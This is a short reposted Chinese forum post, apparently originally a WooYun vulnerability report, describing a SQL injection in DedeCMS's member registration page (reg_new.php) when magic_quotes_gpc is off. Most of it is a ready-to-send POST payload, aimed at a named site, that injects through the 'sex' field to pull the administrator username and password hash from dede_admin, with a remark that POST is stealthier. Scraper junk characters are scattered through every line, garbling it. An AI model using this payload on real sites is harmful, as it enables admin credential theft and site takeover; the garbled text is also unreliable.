漏洞类型: SQL注射漏洞, A* ~- m& [. [# L
简要描述:
( l* ]' X4 _% d2 u& T 2 T( j; P0 M& b9 e
需要magic_quotes_gpc=Off,应该是没有什么大危害的漏洞.
- I$ p5 e' O0 O原来在wooyun发过一个Dedecms注射漏洞,貌似并没有修补,重新利用了一下,可以获得管理员密码.) n$ A- U- M8 R$ [4 T, i4 y
详细说明:跟这个漏洞0 K2 B- ?" k0 r" o
; D- q- j: f! q* f/ BWooYun: Dedecms SQL注射导致审核机制绕过漏洞
0 c1 X0 `" G9 F/ N) b是一个漏洞.其实不仅仅是审核机制绕过,可以获得管理员密码的.) s* \; w" F+ P6 X
POST提交以下数据,其实不用POST提交的,这样隐蔽点.' ?* D" \( f% E+ L
+ T8 R3 [5 T. T7 H6 e) p; s) ^
www.political-security.com/member/reg_new.php
% X+ |0 D* e5 v; R
/ R7 i9 _% B k& I" CPOST" k& v8 H) l9 [6 Z) x) j/ E
7 B( r- y# Z" s) N' }% t
dopost=regbase&step=1&mtype=%E4%B8%AA%E4%BA%BA&mtype=%E4%B8%AA%E4%BA%BA&
8 @) H, @9 H Y! B! u$ c$ D1 \userid=c4rp3nt3r&uname=c4rp3nt3r
/ @1 s* O& f: a2 L6 t# ]+ B2 z&userpwd=ssssss&userpwdok=ssssss&email=sss%40ss.ss5 v% @; J# l2 m0 C. q- g
&safequestion=0&safeanswer=&sex=boy',100,100,'sss@xx.xx',1000,0,'www' and @`'`,
; i e7 K8 G# o- }# I9 O h. ?(select concat(userid,0x3a,pwd) from `dede_admin` limit 1),0,'',1316751900,'',1316751900,'');/ [* {# ] B) w5 L) L5 T
%00&vdcode=glos&agree= |
发表于 2013-1-19 08:25:02
收藏
支持
反对